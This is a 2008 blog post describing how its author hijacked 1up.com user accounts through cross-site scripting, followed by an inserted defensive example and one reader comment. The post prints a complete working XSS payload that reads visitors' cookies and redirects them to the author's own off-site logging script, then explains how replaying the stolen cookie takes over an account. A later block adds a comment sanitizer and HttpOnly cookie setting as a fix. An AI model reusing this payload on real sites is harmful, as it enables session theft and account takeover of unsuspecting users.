Logic’s Last Stand

June 19, 2008

Sorry 1up, it had to be done

Filed under: Computers, Gaming — Zurahn @ 2:45 am

Web design and security are tough, because they are a balancing act. You want to tighten things up, but unless you put a ton of work into very precise filtering, the result is that you cut your users off from some benefits. As someone who has used web formatting for years, being able to put it into comments and forum posts is a boon.

That said, there is one thing that you just cannot allow — JavaScript. Aside from the obvious ability to annoy users or redirect the page, it can also be used to steal data.

So I present to you how I hacked 1up user accounts:

<script type="text/javascript" src="http://tinyurl.com/5uujea"></script>
<script type="text/javascript">
var data = document.cookie;
var address = window.location;
var params = Object.toQueryString({data: data, address: address});
var url = 'http://zurahn.freehostia.com';
url += '/cookiemonster.php?' + params;
var redirect = readCookie('redirect');

if(redirect == null)
{
    createCookie('redirect',1,1);
    window.location = url;
}

function createCookie(name,value,days) {
    if (days) {
        var date = new Date();
        date.setTime(date.getTime()+(days*24*60*60*1000));
        var expires = "; expires="+date.toGMTString();
    }
    else var expires = "";
    document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
        var c = ca[i];
        while (c.charAt(0)==' ') c = c.substring(1,c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}

</script>

This is called cross-site scripting (XSS), and there’s a reason it’s one of the most prominent web security threats.

Prototype.js (the tinyurl) is used to convert the user’s cookie data and the current page address into a valid query string, which is used to send the data to an off-site page via a redirect, after first writing a cookie recording that the user has visited the page once. The off-site page stores the cookie data in a database table, then redirects back to the original page, which no longer redirects because of the cookie created earlier.

Once this has happened, I have all the cookie data. All I then need to do is create a new cookie for that domain (or edit my own) and I am in the account of whoever visited the page.
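The fix for the balance problem raised at the top of this post, as an added example that is not code from the post or from 1up: a comment renderer that keeps a few formatting tags but rebuilds each one from its name alone, so the script tags in the payload above come out as literal text, plus a session cookie marked HttpOnly so document.cookie never exposes it. The tag list, href rules and cookie name are my own assumptions.

```javascript
// Added example, not code from the post: let users keep simple formatting
// while making the payload above inert. Layer 1 re-emits only whitelisted tags
// and escapes everything else; layer 2 marks the session cookie HttpOnly so
// document.cookie cannot read it. Tag list and cookie name are my assumptions.

const ALLOWED_TAGS = new Set(['b', 'i', 'u', 'em', 'strong', 'p', 'br', 'a']);
// Only http(s) or site-relative links; blocks javascript: and data: URLs.
const SAFE_HREF = /^(https?:\/\/|\/)[^\s"'<>]*$/;

function escapeHtml(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// Render a comment body. Allowed tags are rebuilt from their name alone, so
// attributes such as onclick= or src= are never copied to the output.
function renderComment(body) {
  const tagRe = /<(\/?)([a-zA-Z]+)([^>]*)>/g;
  let out = '', last = 0, m;
  while ((m = tagRe.exec(body)) !== null) {
    out += escapeHtml(body.slice(last, m.index));
    last = tagRe.lastIndex;
    const [raw, slash, nameRaw, attrs] = m;
    const name = nameRaw.toLowerCase();
    if (!ALLOWED_TAGS.has(name)) { out += escapeHtml(raw); continue; } // <script> lands here
    if (slash) { out += '</' + name + '>'; continue; }
    if (name !== 'a') { out += '<' + name + '>'; continue; }
    const href = /href\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    if (href && SAFE_HREF.test(href[1])) {
      out += '<a href="' + escapeHtml(href[1]) + '" rel="nofollow">';
    } else {
      out += escapeHtml(raw); // unsafe or missing href: show the tag as text
    }
  }
  return out + escapeHtml(body.slice(last));
}

// Server side: HttpOnly keeps the session cookie out of document.cookie, which
// is exactly the value the payload above reads; Secure and SameSite limit it further.
function sessionCookieHeader(sessionId) {
  return 'session=' + encodeURIComponent(sessionId) +
         '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// Constructed sample input modelled on the post's payload shape.
const sample = '<script src="http://example.invalid/x.js"></script><b>hi</b>';
console.log(renderComment(sample));
console.log(sessionCookieHeader('abc 123'));
```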

1up, your page design has always been ugly, but I can deal with that. Your features and news are hit-or-miss. Alright. Your forums are slow and empty. I’ve got friends. And your user features are marred by formatting bugs. I’ve got other outlets. But my own and everyone else’s account is seriously at risk on every visit to any community page.

1 Comment »

  1. Damn. This is Steel. And this stuff is scary.

    Comment by SteelyBoy, afraid of teh internets. — June 19, 2008 @ 9:29 am
